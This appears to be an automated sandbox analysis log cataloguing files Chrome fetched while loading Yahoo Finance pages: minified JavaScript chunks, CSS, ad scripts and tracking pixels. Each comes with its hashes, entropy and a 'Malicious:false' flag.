                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/StarRating.DpC97Zrz.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as P,e as U,d as G,f as L,i as $,q as H,k as C,n as _,X as Q,P as Y,U as Z,b as ee,p as B,j as te,x as O,t as le,h as ne}from"./scheduler.Dr9AAxFe.js";import{S as z,i as q,t as y,a as S,c as A,b as N,m as T,d as R}from"./index.DCSmZEjO.js";import{ab as re,n as ae,a7 as ie,t as se}from"./commonUtil.CI22_Irn.js";import{u as oe,f as ce,s as ue}from"./StarRating.svelte_svelte_type_style_lang.CKEtkus0.js";import{S as J}from"./Sparkline.D1F12_MV.js";import{L as fe}from"./Link.Cll6KZpb.js";import{e as j}from"./each.BExQfwb4.js";import{I as K}from"./Icon.BSWt_jx8.js";import{a as me,S as ge}from"./star.BeZIjP36.js";var W=oe,X=ce,he=ue,_e=function(r,t){const{min:l,max:e,value:i,start:o=i,w:c=140,h:s=25,axisColor:n="#e0e4e9",labelTextColor:a="#5b636a",candleColor:u="#0f69ff",locale:V="en",fractionDigits:k=2,barHeight:d=2,font:w="10px Helvetica Neue, Helvetica, Arial, sans-serif"}=t;if(!W.isNumber(l)||!W.isNumber(e)||!W.isNumber(i))return;const p=1.2*W.extractFontSize(w),x=(s-p-d-2)/3,h=[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (30142), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):30142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.262622575589199
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:oB+Pgmf4f4fkSpKYTwHhrZNqFQEVwWI6vLEts6XfEQxZyafRVfaPp:TPD4Af9tTwHDNqLLGsQrt4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D133CBEA9C1D56D1CBE4CB6E77F0EBF6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9474B4E8F5149B1124468C4590E850F7BBF141F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5E1E920D663D0BC1E363EC56C7FCCDEDD061F95FA60158C3AF425DAA952027CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:29A9268266585F047F69B565CDF5B1199A6D729A452513A0D534C0FA0B5886D46B7F9EDCB5948340DF45B1C4E9C942E61C53FEF102A7DBEBFF1C2191263C791B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-video-3.2.2-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-video"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(i[a])return i[a].exports;var n=i[a]={i:a,l:!1,exports:{}};return e[a].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i={};return t.m=e,t.c=i,t.d=function(e,i,a){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var i=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,i){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537072399&val=6863456619421248072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (36217)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):36339
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.280002178499624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:1wAIxQpg2rh5k1aifQlCaH5H7uDl0/YdfIjz21OhGVsF:J+Qth5wlaH5HiDlgvH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3CA393BCF81C28B3BDE45F0DCC5DACC3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:66B44E3B7A11AD94132DBC83FDB3C991EAC6EF87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0AF74F7EAF34A66F9A70FD832AFBF75E237DC10A3BB9AB71C9F6B5F916B7E155
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9CD5E64EADE9A0D8FEBC8F32A2E381A6F7F16D526293A5093629C84EBA4B62081F2C57856180ED6775497D5799E317788EE6A789F7BF52F7642C009A057540D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/sortable.esm.Cw1ESr5Y.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/**!. * Sortable 1.15.3. * @author.RubaXa <trash@rubaxa.org>. * @author.owenm <owen23355@gmail.com>. * @license MIT. */function le(o,t){var e=Object.keys(o);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(o);t&&(n=n.filter(function(i){return Object.getOwnPropertyDescriptor(o,i).enumerable})),e.push.apply(e,n)}return e}function z(o){for(var t=1;t<arguments.length;t++){var e=arguments[t]!=null?arguments[t]:{};t%2?le(Object(e),!0).forEach(function(n){Me(o,n,e[n])}):Object.getOwnPropertyDescriptors?Object.defineProperties(o,Object.getOwnPropertyDescriptors(e)):le(Object(e)).forEach(function(n){Object.defineProperty(o,n,Object.getOwnPropertyDescriptor(e,n))})}return o}function Mt(o){"@babel/helpers - typeof";return typeof Symbol=="function"&&typeof Symbol.iterator=="symbol"?Mt=function(t){return typeof t}:Mt=function(t){return t&&typeof Symbol=="function"&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},Mt(o)}function Me(o,t,e){return t in o?Object.d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):22537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.532860985165806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:4qEMQl6FtO53n+8svyf53Fo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qEMQlwOFn+DCFoeeFqYt2TJisnC6ZcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:38D4F310E650C3877EB2E2C55860F77B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:41D2F4BD61DF909B531BF54EC54AB66CFC8712CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6F4951F54B1F8F2F57A668518D6EBC3D94ABF1A1A1ACA440DE486B13D02D85D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:037D0A44AD44D3934029F40997165FB3F690D0C5804BF8EFBD1DC4928258A963D6F7B60D761C17E1BFE581EEEF9C58C58C6E85BF983E4203165F61939FBEE440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tpc.googlesyndication.com/pagead/js/r20241007/r20110914/client/qs_click_protection_fy2021.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):28495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.927142741711934
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:KYNg7ajw/LUdMMIcvX2Kr8xOmwodG3wHOIY577z5mB2psdadmEyaNG631b4qy/:KYyew/oSMIc+HMpUOz51HadHbUGYI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DB31E25FAB1FDB8B67AC992403AACE68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C7857BA2E73EEB0A016FF3A625905A7DF3081C73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:684FD5D5F57989D261878AADF7F60022AFE63CC62BBE0AF4A6A450237955024B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:900C45F458AF064474F97584DE897D772185C13E9C64C536C698F2F04758A84D944B850BA22C931A76F97E9F55CBDFFF685EC0451CF75728BCDC708B1B47C745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsuXwoQ_xtvI1PG5qEZslAXqrXPYnnOFrUVQF9hBwAW7V5n05jRwVnkSSkXUjTD62LfnUFNutx7TdUFbGSIdD15Sb9RCmI1B0WVMlGEKoBQKVAIq_kduenSPL_O8zHMLIaRo3j7GttqIdSMUub1mMIk&sig=Cg0ArKJSzLa--ZhzD1_VEAE&id=lidar2&mcvt=1010&p=0,0,90,728&tm=1017.5&tu=7.599999999976717&mtos=1010,1010,1010,1010,1010&tos=1010,0,0,0,0&v=20241007&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=34&adk=1614649247&rs=6&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=v&co=2434776500&rst=1728414963740&rpt=2121&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3121)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3122
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.461647434358285
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:n7EG0w7/mFB9KAzUucsX9s99p5VWTEXeKYfII:nlBjyaAzUkts99BaEXeKsII
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FA932BCD1015583CD03728E1F0408EE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C72908937ED005C31668B723EFC605D229ABF15F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:189F098CE18D4C93604F4576DBE4DCE74E6A013E526FC3E4BB20213F1E34B940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E8B782E7B5734E255ED0FB5159746F19834CA474FEA3F5BE6B6632C6C93BDB29029D9B4C4579ECE46E069B2FE56EACE721BAD90AD7837BF98679BC8244981266
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Image.BUzErVch.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as U,p as q,k as b,i as d,e as G,d as W,q as n,_ as N,C as m,a5 as B,G as E,n as w,c as F,u as M,g as Y,a as j}from"./scheduler.Dr9AAxFe.js";import{S as z,i as J,g as K,a as g,e as O,t as h}from"./index.DCSmZEjO.js";const Q=r=>({}),C=r=>({});function V(r){let e,t,a,l,c,f;return{c(){e=G("img"),this.h()},l(o){e=W(o,"IMG",{class:!0,alt:!0,src:!0,srcset:!0,sizes:!0,fetchpriority:!0,loading:!0}),this.h()},h(){n(e,"class",t=N(`tw-bg-opacity-25 ${r[4]}`)+" yf-13q9uv1"),n(e,"alt",r[3]),m(e.src,a=r[1])||n(e,"src",a),B(e,l=r[2])||n(e,"srcset",l),n(e,"sizes",r[8]),n(e,"fetchpriority",r[6]),n(e,"loading",r[0])},m(o,s){b(o,e,s),c||(f=E(e,"error",r[13]),c=!0)},p(o,s){s&16&&t!==(t=N(`tw-bg-opacity-25 ${o[4]}`)+" yf-13q9uv1")&&n(e,"class",t),s&8&&n(e,"alt",o[3]),s&2&&!m(e.src,a=o[1])&&n(e,"src",a),s&4&&l!==(l=o[2])&&n(e,"srcset",l),s&256&&n(e,"sizes",o[8]),s&64&&n(e,"fetchpriority",o[6]),s&1&&n(e,"loading",o[0])},i:w,o:w,d(o){o&&d(e),c=!1,f()}}}function v(r){let e;const t=r[12].fallback,a=F(t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1845)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361834466850386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:eyOQjXI+LJKeIlMDT08lh7AfGRp7JBDiXalMDww1q/jYB+oHTM7/:BjXI+LJKexTnlme7PcfN+j7/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B144109278DA8D05E7FE2BE9514F7DC5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:28A5E46E1985FB27464B908FFD4DC017220C1871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6C413A341A208FD27EDB6CF154B190F855556AF5EAE610FA8038A3F89D8AFE62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7EE60F956B559436BFDA330FEF0E3E8750D783B9F298A609D977474D3322B9BE33CF6F97D8885BAB0F21CEAA4761A4E60CACA114415C663CABD36FC1692C6AC8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/TopicPill.DFWIHl7d.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as k,c as g,A as b,e as E,d as v,f as I,i as _,B as d,U as m,k as M,u as N,g as S,a as A}from"./scheduler.Dr9AAxFe.js";import{S as T,i as q,t as y,a as B}from"./index.DCSmZEjO.js";import{g as C}from"./spread.CgU5AtxT.js";import{g as h}from"./i13nUtil.C-uBpR7k.js";function D(n){let t,f,u,s;const r=n[7].default,l=g(r,n,n[6],null);let c=[{class:f="topic-link "+n[1]},{"data-testid":n[5]},{href:n[2]},{title:n[3]},n[4]?{"data-sveltekit-reload":""}:{},{"data-ylk":u=h({elm:"navcat",elmt:"link",itc:0,sec:"topics",subsec:"block",...n[0]})}],o={};for(let e=0;e<c.length;e+=1)o=b(o,c[e]);return{c(){t=E("a"),l&&l.c(),this.h()},l(e){t=v(e,"A",{class:!0,"data-testid":!0,href:!0,title:!0,"data-ylk":!0});var a=I(t);l&&l.l(a),a.forEach(_),this.h()},h(){d(t,o),m(t,"yf-nhs2sl",!0)},m(e,a){M(e,t,a),l&&l.m(t,null),s=!0},p(e,[a]){l&&l.p&&(!s||a&64)&&N(l,r,e,e[6],s?A(r,e[6],a,null):S(e[6]),null),d(t,o=C(c,[(!s||a&2&&f!==(f="topic-link "+e[1]))&&{class:f},(!s||a&32)&&{"data-testid":e[5]},(!s||a&4)&&{hr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (17618)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17619
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.795801194680737
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:1DHMddphgN5zzhRTcfBbu2Qu0BaxtxIMVxI5R0:hHYmN8F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:480B76BC606A4D170BB7DAAD8FA7DE33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A93C6475042C7E88B287D775F9AC18DD289BAE09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8AB8D10C62803C94DA62E7D82D9C05202D309A1CF285D340008039A696CDF4C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9F1EBBCF0C9A58C1117D26A861DB14108449ADC3CDF4B43D59881379F385556C14E3566630F6EF619E277DA6004603FDD98A39CDE5FF9338CC174565272AD66E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Table.BF6icsxP.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.container.yf-sw60wy{display:flex;align-items:center;justify-content:center}table.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{font-variant-numeric:tabular-nums;font-size:var(--table-font, var(--font-s));width:100%}table.yf-1dbt8wv .loader.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{margin-top:14px;margin-bottom:14px;width:auto;height:1rem;background:#d9d9d933;border-radius:var(--border-radius-s);margin-left:auto}table.yf-1dbt8wv .body .row.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{border-bottom:1px solid var(--surface1);position:relative}table.yf-1dbt8wv .body .row.reorder.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{cursor:grab}table.yf-1dbt8wv .body .row .cell.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{padding:var(--space-2) 0;padding-left:var(--space-4);font-weight:var(--table-cell-font-weight, var(--font-medium));text-align:right;white-space:nowrap}table.yf-1dbt8wv .body .row .cell.ellipsis.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{text-overflow:ellipsis;overflow:clip}table.yf-1dbt8wv .body .row .cell.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3237)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.311237145995655
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:X+ZjS65XDl5XpfBfj+Meh7URvCVOLIgskRGE7grGDz9LkSR8MWQYBE:O0oR53nOOLIghgrgCQY+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:61F49E779E4E8ABC1225D63669A34D67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6FD8516FA3E99D15BEE75A964B07D6C03CF61998
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CE13D5D11A2C8A21612D2EAE7A1732F20CA5A38DAF0BE8AF6AAEEF64E07D75E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6095C67701251D51A475A2F2ADD35BCCE6144195CAF11DEA5274EDD669C8600823869A833D225B7427DDB8500F692D912F3B7F917A38E12415B0B4AFE2293155
